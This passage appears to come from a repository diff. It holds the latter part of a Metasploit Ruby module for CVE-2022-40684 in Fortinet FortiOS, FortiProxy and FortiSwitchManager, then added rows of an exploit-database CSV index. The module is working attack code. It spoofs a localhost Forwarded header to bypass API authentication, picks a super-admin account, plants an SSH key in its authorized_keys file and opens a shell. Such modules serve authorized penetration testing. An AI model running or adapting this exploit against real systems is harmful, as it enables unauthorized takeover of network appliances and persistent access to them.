in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API
to gain access to a chosen account. And then add a SSH key to the
authorized_keys file of the chosen account, allowing
to login to the system with the chosen account.
Successful exploitation results in remote code execution.
},
'Author' => [
'Heyder Andrade <@HeyderAndrade>', # Metasploit module
'Zach Hanley <@hacks_zach>', # PoC
],
'References' => [
['CVE', '2022-40684'],
['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],
['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2022-10-10', # Vendor advisory
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Privileged' => true,
'Targets' => [
[
'FortiOS',
{
'DefaultOptions' => {
'PAYLOAD' => 'generic/ssh/interact'
},
'Payload' => {
'Compat' => {
'PayloadType' => 'ssh_interact'
}
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
IOC_IN_LOGS,
ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file
]
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),
OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),
OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),
OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),
OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),
OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])
]
)
end
def username
if datastore['USERNAME']
@username ||= datastore['USERNAME']
else
@username ||= detect_username
end
end
def ssh_rport
datastore['SSH_RPORT']
end
def current_keys
@current_keys ||= read_keys
end
def ssh_keygen
# ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`
if datastore['PRIVATE_KEY']
@ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(
File.read(datastore['PRIVATE_KEY']),
datastore['KEY_PASS'],
datastore['PRIVATE_KEY']
)
else
@ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')
end
end
def ssh_private_key
ssh_keygen.to_pem
end
def ssh_pubkey
Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
end
def authorized_keys
pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost"
end
def fortinet_request(params = {})
send_request_cgi(
{
'ctype' => 'application/json',
'agent' => 'Report Runner',
'headers' => {
'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\""
}
}.merge(params)
)
end
def check
vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
# a normal request to the API should return a 401
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
'ctype' => 'application/json'
})
return CheckCode::Unknown('Target did not respond to check.') unless res
return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401
# Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable
res = fortinet_request({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/status')
})
return CheckCode::Safe unless res&.code == 200
version = res.get_json_document['version']
print_good("Target is running the version #{version}, which is vulnerable.")
Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\t give you access to the host.') unless sock }
CheckCode::Vulnerable('And SSH is running which makes it exploitable.')
end
def cleanup
return unless ssh_socket
# it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method
data = {
"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}" => '""'
}
fortinet_request({
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
'data' => data.to_json
})
end
def detect_username
vprint_status('User auto-detection...')
res = fortinet_request(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/admin')
)
users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact
# we prefer to use admin, but if it doesn't exist we chose a random one.
if datastore['PREFER_ADMIN']
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")
users.include?('admin') ? 'admin' : users.sample
else
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.")
(users - ['admin']).sample
end
end
def add_ssh_key
if current_keys.include?(authorized_keys)
# then we'll remove that on cleanup
print_good('Your key is already in the authorized_keys file')
return
end
vprint_status('Adding SSH key to authorized_keys file')
# Adding the SSH key as the last entry in the authorized_keys file
keystoadd = current_keys.first(2) + [authorized_keys]
data = keystoadd.map.with_index { |key, idx| ["ssh-public-key#{idx + 1}", "\"#{key}\""] }.to_h
res = fortinet_request({
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
'data' => data.to_json
})
fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500
body = res.get_json_document
fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/
end
def read_keys
vprint_status('Reading SSH key from authorized_keys file')
res = fortinet_request({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username)
})
fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200
result = res.get_json_document['results'].first
['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|
result[key].gsub('"', '') unless result[key].empty?
end.compact
end
def do_login(ssh_options)
# ensure we don't have a stale socket hanging around
ssh_options[:proxy].proxies = nil if ssh_options[:proxy]
begin
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)
end
rescue Rex::ConnectionError
fail_with(Failure::Unreachable, 'Disconnected during negotiation')
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, 'Timed out during negotiation')
rescue Net::SSH::AuthenticationFailed
fail_with(Failure::NoAccess, 'Failed authentication')
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
end
fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
end
def exploit
print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}")
add_ssh_key
vprint_status('Establishing SSH connection')
ssh_options = ssh_client_defaults.merge({
auth_methods: ['publickey'],
key_data: [ ssh_private_key ],
port: ssh_rport
})
ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
do_login(ssh_options)
handler(ssh_socket)
end
end

View file

@ -3259,6 +3259,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36813,exploits/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",local,hardware,,2015-04-21,2015-04-21,0,CVE-2014-7951;OSVDB-120991,,,,,
44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware,,2018-07-05,2018-07-05,0,CVE-2018-13108,Local,,,,
44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,,2018-07-05,2018-07-05,0,CVE-2018-13110,Local,,,,
52244,exploits/hardware/local/52244.txt,"ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)",2025-04-16,ub3rsick,local,hardware,,2025-04-16,2025-04-16,0,CVE-2023-26602,,,,,
40271,exploits/hardware/local/40271.txt,"Cisco ASA / PIX - 'EPICBANANA' Local Privilege Escalation",2016-08-19,"Shadow Brokers",local,hardware,,2016-08-19,2016-09-15,0,CVE-2016-6367,,,,,
30237,exploits/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",local,hardware,,2013-12-12,2013-12-18,1,CVE-2013-7030;OSVDB-100916,,,,,
34954,exploits/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",local,hardware,,2010-11-03,2014-10-14,1,CVE-2010-3039;OSVDB-69158,,,,,https://www.securityfocus.com/bid/44672/info
@ -3279,6 +3280,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9955,exploits/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Local Privilege Escalation",2009-10-20,trompele,local,hardware,,2009-10-19,,1,CVE-2009-4607;OSVDB-61789,,,,,
41745,exploits/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",local,hardware,,2017-03-27,2017-03-27,1,CVE-2017-5227;NAS-201703-21,,,,,http://www.ush.it/team/ush/hack-qnap/qnap.txt
32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware,,2014-03-19,2014-03-19,0,OSVDB-104664,,,,,
52242,exploits/hardware/local/52242.txt,"Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account",2025-04-16,ub3rsick,local,hardware,,2025-04-16,2025-04-16,0,CVE-2021-33216,,,,,
51832,exploits/hardware/local/51832.c,"Saflok - Key Derication Function Exploit",2024-02-28,planthopper3301,local,hardware,,2024-02-28,2024-02-28,0,,,,,,
20999,exploits/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (1)",2001-07-10,"Charles Stevenson",local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
21000,exploits/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (2)",2001-07-10,ml85p,local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
@ -3546,6 +3548,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15842,exploits/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",remote,hardware,,2010-12-29,2011-09-18,1,OSVDB-70230,,,,,
9209,exploits/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,remote,hardware,,2009-07-19,2016-10-27,1,OSVDB-57143;CVE-2009-2766;CVE-2009-2765;OSVDB-55990;CVE-2008-6975;OSVDB-55636;CVE-2008-6974,,,,,
7389,exploits/hardware/remote/7389.html,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",remote,hardware,,2008-12-07,,1,CVE-2008-6975;CVE-2008-6974;OSVDB-55636,,,,,
52246,exploits/hardware/remote/52246.py,"Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE)",2025-04-16,Photubias,remote,hardware,,2025-04-16,2025-04-16,0,CVE-2018-1207,,,,,
51248,exploits/hardware/remote/51248.py,"Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure",2023-04-05,"Ken Pyle",remote,hardware,,2023-04-05,2023-04-05,0,CVE-2020-5330;CVE-2019-15993,,,,,
50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
@ -4429,6 +4432,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47979,exploits/hardware/webapps/47979.txt,"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting",2020-01-29,LiquidWorm,webapps,hardware,,2020-01-29,2020-01-30,0,,"Cross-Site Scripting (XSS)",,,,
47644,exploits/hardware/webapps/47644.py,"FlexAir Access Control 2.3.35 - Authentication Bypass",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,CVE-2019-7666,,,,,
47638,exploits/hardware/webapps/47638.sh,"FlexAir Access Control 2.4.9api3 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,,,,,,
52240,exploits/hardware/webapps/52240.py,"FLIR AX8 1.46.16 - Remote Command Injection",2025-04-16,ub3rsick,webapps,hardware,,2025-04-16,2025-04-16,0,CVE-2022-37061,,,,,
45597,exploits/hardware/webapps/45597.txt,"FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,
45602,exploits/hardware/webapps/45602.py,"FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,
45606,exploits/hardware/webapps/45606.txt,"FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,
@ -10404,6 +10408,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52215,exploits/multiple/hardware/52215.txt,"ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-6516,,,,,
52216,exploits/multiple/hardware/52216.txt,"ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-48839,,,,,
52224,exploits/multiple/hardware/52224.txt,"ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-51546,,,,,
52231,exploits/multiple/hardware/52231.html,"ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF)",2025-04-16,LiquidWorm,hardware,multiple,,2025-04-16,2025-04-16,0,CVE-2024-48846,,,,,
52182,exploits/multiple/hardware/52182.txt,"ABB Cylon Aspect 3.08.02 - PHP Session Fixation",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52220,exploits/multiple/hardware/52220.txt,"ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,,,,,,
52180,exploits/multiple/hardware/52180.txt,"ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
@ -11919,6 +11924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",2021-01-22,Hodorsec,webapps,multiple,,2021-01-22,2021-01-22,0,,,,,,
48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,,2020-04-24,2020-04-24,0,,,,,,
38016,exploits/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' SQL Injection",2012-11-09,anonymous,webapps,multiple,,2012-11-09,2017-11-09,1,CVE-2012-4949;OSVDB-87277,,,,,https://www.securityfocus.com/bid/56474/info
52241,exploits/multiple/webapps/52241.txt,"Ethercreative Logs 3.0.3 - Path Traversal",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2022-23409,,,,,
10209,exploits/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",webapps,multiple,,2009-10-13,,1,CVE-2009-3828;OSVDB-59139,,2009-11-22-EverFocus_Edsr_Exploit.tar.gz,,,
52126,exploits/multiple/webapps/52126.py,"Exclusive Addons for Elementor 2.6.9 - Stored Cross-Site Scripting (XSS)",2025-04-05,"Al Baradi Joy",webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2024-1234,,,,,
49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
@ -11959,6 +11965,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7
51550,exploits/multiple/webapps/51550.py,"FuguHub 8.1 - Remote Code Execution",2023-07-03,redfire359,webapps,multiple,,2023-07-03,2023-07-03,0,CVE-2023-24078,,,,,
51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
52238,exploits/multiple/webapps/52238.txt,"Garage Management System 1.0 (categoriesName) - Stored XSS",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2022-41358,,,,,
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,
@ -12156,7 +12163,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
52177,exploits/multiple/webapps/52177.md,"Nagios Log Server 2024R1.3.1 - API Key Exposure",2025-04-11,"Seth Kraft",webapps,multiple,,2025-04-11,2025-04-11,0,,,,,,
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-16,0,CVE-2025-29471,,,,,
52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
@ -12280,6 +12287,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45969,exploits/multiple/webapps/45969.txt,"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion",2018-12-11,bzyo,webapps,multiple,,2018-12-11,2018-12-11,0,,,,,,
44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,,2018-03-12,2018-03-12,0,,,,,,
50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,,2021-08-26,2021-08-26,0,,,,,,
52236,exploits/multiple/webapps/52236.txt,"ProConf 6.0 - Insecure Direct Object Reference (IDOR)",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2018-16606,,,,,
9728,exploits/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,webapps,multiple,,2009-09-20,,1,OSVDB-58298;CVE-2009-3324,,,,,
52103,exploits/multiple/webapps/52103.py,"Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass",2025-03-28,VeryLazyTech,webapps,multiple,,2025-03-28,2025-04-13,0,CVE-2024-4358,,,,,
35219,exploits/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",webapps,multiple,,2014-11-17,2014-11-17,0,OSVDB-114840;CVE-2014-9237,,,,,
@ -12397,6 +12405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47308,exploits/multiple/webapps/47308.py,"Tableau - XML External Entity",2019-08-27,"Jarad Kopf",webapps,multiple,,2019-08-27,2019-08-27,1,CVE-2019-15637,,,,,
49828,exploits/multiple/webapps/49828.js,"Tagstoo 2.0.1 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
48805,exploits/multiple/webapps/48805.txt,"Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)",2020-09-11,nepska,webapps,multiple,,2020-09-11,2020-09-11,0,,,,,,
52228,exploits/multiple/webapps/52228.txt,"Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)",2025-04-16,"Ayato Shitomi @ Fore-Z co.ltd",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-46278,,,,,
49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,,2020-12-01,2020-12-01,0,,,,,,
49194,exploits/multiple/webapps/49194.txt,"Testa Online Test Management System 3.4.7 - 'q' SQL Injection",2020-12-04,"Ultra Security Team",webapps,multiple,,2020-12-04,2020-12-04,0,,,,,,
49077,exploits/multiple/webapps/49077.txt,"TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution",2020-11-19,"Darren King",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
@ -12463,6 +12472,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43441,exploits/multiple/webapps/43441.txt,"WinMX < 2.6 - Design Error",2003-06-02,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00006,,,,,http://gulftech.org/advisories/WinMX%20Design%20Error/6
47342,exploits/multiple/webapps/47342.html,"Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery",2019-09-02,"Bhadresh Patel",webapps,multiple,,2019-09-02,2020-06-18,0,,,,,,
51805,exploits/multiple/webapps/51805.py,"Wondercms 4.3.2 - XSS to RCE",2024-02-19,"Anas Zakir",webapps,multiple,,2024-02-19,2024-02-19,0,,,,,,
52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
@ -13045,6 +13055,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44336,exploits/php/dos/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,dos,php,,2018-03-23,2018-03-23,0,,"Denial of Service (DoS)",,,,
52218,exploits/php/hardware/52218.txt,"ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,CVE-2024-48844,,,,,
52219,exploits/php/hardware/52219.txt,"ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,,,,,,
52234,exploits/php/hardware/52234.txt,"ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) - File Write DoS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
52233,exploits/php/hardware/52233.txt,"ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
52232,exploits/php/hardware/52232.txt,"ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) - Remote Code Execution",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
13768,exploits/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,local,php,,2010-06-07,2017-07-19,1,,,,http://www.exploit-db.com/screenshots/idlt14000/screen-shot-2011-01-07-at-113530-pm.png,http://www.exploit-db.comCastRipper.exe,
28504,exploits/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",local,php,,2006-09-09,2016-12-02,1,CVE-2006-4625;OSVDB-29603,,,,http://www.exploit-db.comphp-4.4.4.tar.gz,https://www.securityfocus.com/bid/19933/info
21347,exploits/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,local,php,,2002-03-17,2016-12-02,1,CVE-2002-0484;OSVDB-5282,,,,http://www.exploit-db.comphp-4.1.2.tar.gz,https://www.securityfocus.com/bid/4325/info
@ -15597,6 +15610,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49055,exploits/php/webapps/49055.txt,"Car Rental Management System 1.0 - Remote Code Execution (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,,2020-11-16,2020-11-16,0,,,,,,
49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php,,2020-11-10,2020-11-10,0,,,,,,
49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,,2020-12-02,2020-12-02,0,,,,,,
52243,exploits/php/webapps/52243.py,"Car Rental Project 1.0 - Remote Code Execution",2025-04-16,ub3rsick,webapps,php,,2025-04-16,2025-04-16,0,CVE-2020-5509,,,,,
49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,,2021-02-03,2021-02-03,0,,,,,,
51567,exploits/php/webapps/51567.txt,"Car Rental Script 1.8 - Stored Cross-site scripting (XSS)",2023-07-04,CraCkEr,webapps,php,,2023-07-04,2023-07-04,0,,,,,,
43308,exploits/php/webapps/43308.txt,"Car Rental Script 2.0.4 - 'val' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17637,,,,,
@ -22533,6 +22547,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php,,2006-12-18,2013-10-30,1,CVE-2006-6721;OSVDB-31516,,,,,https://www.securityfocus.com/bid/21637/info
23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php,,2003-11-17,2012-12-14,1,,,,,,https://www.securityfocus.com/bid/9054/info
51388,exploits/php/webapps/51388.py,"KodExplorer 4.49 - CSRF to Arbitrary File Upload",2023-04-25,"Mr Empy",webapps,php,,2023-04-25,2023-04-25,0,CVE-2022-4944,,,,,
52245,exploits/php/webapps/52245.txt,"KodExplorer 4.52 - Open Redirect",2025-04-16,"Rahad Chowdhury",webapps,php,,2025-04-16,2025-04-16,0,,,,,,
